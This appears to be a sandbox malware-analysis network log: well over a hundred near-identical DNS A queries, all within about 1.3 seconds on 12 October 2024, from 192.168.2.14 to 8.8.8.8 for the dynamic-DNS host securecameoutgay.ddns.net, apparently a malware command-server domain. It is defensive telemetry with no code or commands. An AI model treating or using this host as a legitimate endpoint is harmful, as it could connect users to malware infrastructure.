                                                    Oct 12, 2024 23:06:04.323103905 CEST192.168.2.148.8.8.80x8103Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.329813957 CEST192.168.2.148.8.8.80xc3c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.336572886 CEST192.168.2.148.8.8.80xc3c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.343225002 CEST192.168.2.148.8.8.80xc3c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.349616051 CEST192.168.2.148.8.8.80xc3c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.356319904 CEST192.168.2.148.8.8.80xc3c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.362966061 CEST192.168.2.148.8.8.80x44deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.369939089 CEST192.168.2.148.8.8.80x44deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.376816988 CEST192.168.2.148.8.8.80x44deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.383764029 CEST192.168.2.148.8.8.80x44deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.390511036 CEST192.168.2.148.8.8.80x44deStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.397556067 CEST192.168.2.148.8.8.80x6ed2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.404467106 CEST192.168.2.148.8.8.80x6ed2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.411290884 CEST192.168.2.148.8.8.80x6ed2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.420810938 CEST192.168.2.148.8.8.80x6ed2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.427766085 CEST192.168.2.148.8.8.80x6ed2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.435075045 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.441967010 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.448715925 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.460891962 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.467606068 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.474900007 CEST192.168.2.148.8.8.80xcb47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.481901884 CEST192.168.2.148.8.8.80xcb47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.488498926 CEST192.168.2.148.8.8.80xcb47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.495239973 CEST192.168.2.148.8.8.80xcb47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.501838923 CEST192.168.2.148.8.8.80xcb47Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.508774996 CEST192.168.2.148.8.8.80xea46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.515669107 CEST192.168.2.148.8.8.80xea46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.522772074 CEST192.168.2.148.8.8.80xea46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.529705048 CEST192.168.2.148.8.8.80xea46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.537914038 CEST192.168.2.148.8.8.80xea46Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.544950008 CEST192.168.2.148.8.8.80xc263Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.551731110 CEST192.168.2.148.8.8.80xc263Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.558469057 CEST192.168.2.148.8.8.80xc263Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.565110922 CEST192.168.2.148.8.8.80xc263Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.572041988 CEST192.168.2.148.8.8.80xc263Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.579603910 CEST192.168.2.148.8.8.80xbff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.586455107 CEST192.168.2.148.8.8.80xbff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.593154907 CEST192.168.2.148.8.8.80xbff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.600471973 CEST192.168.2.148.8.8.80xbff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.607419014 CEST192.168.2.148.8.8.80xbff0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.614480972 CEST192.168.2.148.8.8.80x73f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.621485949 CEST192.168.2.148.8.8.80x73f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.628367901 CEST192.168.2.148.8.8.80x73f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.635355949 CEST192.168.2.148.8.8.80x73f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.642142057 CEST192.168.2.148.8.8.80x73f9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.649039984 CEST192.168.2.148.8.8.80xe79bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.655913115 CEST192.168.2.148.8.8.80xe79bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.662674904 CEST192.168.2.148.8.8.80xe79bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.669207096 CEST192.168.2.148.8.8.80xe79bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.675906897 CEST192.168.2.148.8.8.80xe79bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.682802916 CEST192.168.2.148.8.8.80x40acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.689723969 CEST192.168.2.148.8.8.80x40acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.697062969 CEST192.168.2.148.8.8.80x40acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.704057932 CEST192.168.2.148.8.8.80x40acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.711158991 CEST192.168.2.148.8.8.80x40acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.718111038 CEST192.168.2.148.8.8.80x5f5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.724638939 CEST192.168.2.148.8.8.80x5f5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.731065035 CEST192.168.2.148.8.8.80x5f5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.737835884 CEST192.168.2.148.8.8.80x5f5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.744805098 CEST192.168.2.148.8.8.80x5f5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.751457930 CEST192.168.2.148.8.8.80x91b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.758263111 CEST192.168.2.148.8.8.80x91b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.764645100 CEST192.168.2.148.8.8.80x91b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.771192074 CEST192.168.2.148.8.8.80x91b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.778450012 CEST192.168.2.148.8.8.80x91b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.785837889 CEST192.168.2.148.8.8.80xfecbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.792484999 CEST192.168.2.148.8.8.80xfecbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.799066067 CEST192.168.2.148.8.8.80xfecbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.805552959 CEST192.168.2.148.8.8.80xfecbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.812083960 CEST192.168.2.148.8.8.80xfecbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.818814039 CEST192.168.2.148.8.8.80xa0d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.825644016 CEST192.168.2.148.8.8.80xa0d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.832032919 CEST192.168.2.148.8.8.80xa0d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.838520050 CEST192.168.2.148.8.8.80xa0d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.845690966 CEST192.168.2.148.8.8.80xa0d3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.852844954 CEST192.168.2.148.8.8.80x7f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.859715939 CEST192.168.2.148.8.8.80x7f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.866698027 CEST192.168.2.148.8.8.80x7f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.873044014 CEST192.168.2.148.8.8.80x7f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.879271030 CEST192.168.2.148.8.8.80x7f5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.886269093 CEST192.168.2.148.8.8.80x96c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.893171072 CEST192.168.2.148.8.8.80x96c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.899888039 CEST192.168.2.148.8.8.80x96c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.907195091 CEST192.168.2.148.8.8.80x96c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.913947105 CEST192.168.2.148.8.8.80x96c2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.921135902 CEST192.168.2.148.8.8.80x8beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.927942991 CEST192.168.2.148.8.8.80x8beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.935631990 CEST192.168.2.148.8.8.80x8beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.942795992 CEST192.168.2.148.8.8.80x8beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.949837923 CEST192.168.2.148.8.8.80x8beStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.956901073 CEST192.168.2.148.8.8.80xe99aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.964000940 CEST192.168.2.148.8.8.80xe99aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.970993042 CEST192.168.2.148.8.8.80xe99aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.978034019 CEST192.168.2.148.8.8.80xe99aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.984724998 CEST192.168.2.148.8.8.80xe99aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.991914034 CEST192.168.2.148.8.8.80xea56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:04.999370098 CEST192.168.2.148.8.8.80xea56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.007200003 CEST192.168.2.148.8.8.80xea56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.014282942 CEST192.168.2.148.8.8.80xea56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.021486998 CEST192.168.2.148.8.8.80xea56Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.028992891 CEST192.168.2.148.8.8.80x80e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.035749912 CEST192.168.2.148.8.8.80x80e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.042704105 CEST192.168.2.148.8.8.80x80e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.050548077 CEST192.168.2.148.8.8.80x80e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.057612896 CEST192.168.2.148.8.8.80x80e4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.064791918 CEST192.168.2.148.8.8.80x55c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.072150946 CEST192.168.2.148.8.8.80x55c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.079323053 CEST192.168.2.148.8.8.80x55c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.086388111 CEST192.168.2.148.8.8.80x55c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.093544960 CEST192.168.2.148.8.8.80x55c4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.100610971 CEST192.168.2.148.8.8.80x5004Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.107562065 CEST192.168.2.148.8.8.80x5004Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.114772081 CEST192.168.2.148.8.8.80x5004Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.121879101 CEST192.168.2.148.8.8.80x5004Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.129035950 CEST192.168.2.148.8.8.80x5004Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.136338949 CEST192.168.2.148.8.8.80xe31fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.143362045 CEST192.168.2.148.8.8.80xe31fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.150602102 CEST192.168.2.148.8.8.80xe31fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.157562971 CEST192.168.2.148.8.8.80xe31fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.164686918 CEST192.168.2.148.8.8.80xe31fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.171613932 CEST192.168.2.148.8.8.80x2540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.178679943 CEST192.168.2.148.8.8.80x2540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.185914993 CEST192.168.2.148.8.8.80x2540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.192838907 CEST192.168.2.148.8.8.80x2540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.199712992 CEST192.168.2.148.8.8.80x2540Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.206963062 CEST192.168.2.148.8.8.80x4a66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.214046001 CEST192.168.2.148.8.8.80x4a66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.221060038 CEST192.168.2.148.8.8.80x4a66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.227726936 CEST192.168.2.148.8.8.80x4a66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.234414101 CEST192.168.2.148.8.8.80x4a66Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.241533041 CEST192.168.2.148.8.8.80xf0d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.248383045 CEST192.168.2.148.8.8.80xf0d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.255604982 CEST192.168.2.148.8.8.80xf0d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.262593031 CEST192.168.2.148.8.8.80xf0d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.269385099 CEST192.168.2.148.8.8.80xf0d7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.276868105 CEST192.168.2.148.8.8.80xc9d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.283627987 CEST192.168.2.148.8.8.80xc9d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.290251970 CEST192.168.2.148.8.8.80xc9d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.297291994 CEST192.168.2.148.8.8.80xc9d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.304425955 CEST192.168.2.148.8.8.80xc9d0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.311573029 CEST192.168.2.148.8.8.80xbfafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.318656921 CEST192.168.2.148.8.8.80xbfafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.325896978 CEST192.168.2.148.8.8.80xbfafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.333067894 CEST192.168.2.148.8.8.80xbfafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.340130091 CEST192.168.2.148.8.8.80xbfafStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.346918106 CEST192.168.2.148.8.8.80x338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.354516029 CEST192.168.2.148.8.8.80x338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.361510992 CEST192.168.2.148.8.8.80x338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.368196964 CEST192.168.2.148.8.8.80x338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.374928951 CEST192.168.2.148.8.8.80x338Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.381685972 CEST192.168.2.148.8.8.80x9294Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.388494968 CEST192.168.2.148.8.8.80x9294Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.395462990 CEST192.168.2.148.8.8.80x9294Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.402189970 CEST192.168.2.148.8.8.80x9294Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.408952951 CEST192.168.2.148.8.8.80x9294Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.415776968 CEST192.168.2.148.8.8.80xbbf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.422369957 CEST192.168.2.148.8.8.80xbbf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.428877115 CEST192.168.2.148.8.8.80xbbf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.436309099 CEST192.168.2.148.8.8.80xbbf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.442651033 CEST192.168.2.148.8.8.80xbbf2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.452995062 CEST192.168.2.148.8.8.80x3e1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.459829092 CEST192.168.2.148.8.8.80x3e1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.466361046 CEST192.168.2.148.8.8.80x3e1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.473479986 CEST192.168.2.148.8.8.80x3e1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.482471943 CEST192.168.2.148.8.8.80x3e1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.489696026 CEST192.168.2.148.8.8.80x916cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.496733904 CEST192.168.2.148.8.8.80x916cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.503412962 CEST192.168.2.148.8.8.80x916cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.510164976 CEST192.168.2.148.8.8.80x916cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.516638041 CEST192.168.2.148.8.8.80x916cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.523706913 CEST192.168.2.148.8.8.80x9eb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.530416965 CEST192.168.2.148.8.8.80x9eb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.536864996 CEST192.168.2.148.8.8.80x9eb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.543864012 CEST192.168.2.148.8.8.80x9eb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.551160097 CEST192.168.2.148.8.8.80x9eb0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.558111906 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.564951897 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.571980000 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.578847885 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.585901976 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.592550039 CEST192.168.2.148.8.8.80x6064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.599715948 CEST192.168.2.148.8.8.80x6064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.606359959 CEST192.168.2.148.8.8.80x6064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.613151073 CEST192.168.2.148.8.8.80x6064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.620280027 CEST192.168.2.148.8.8.80x6064Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:05.626852989 CEST192.168.2.148.8.8.80x897cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
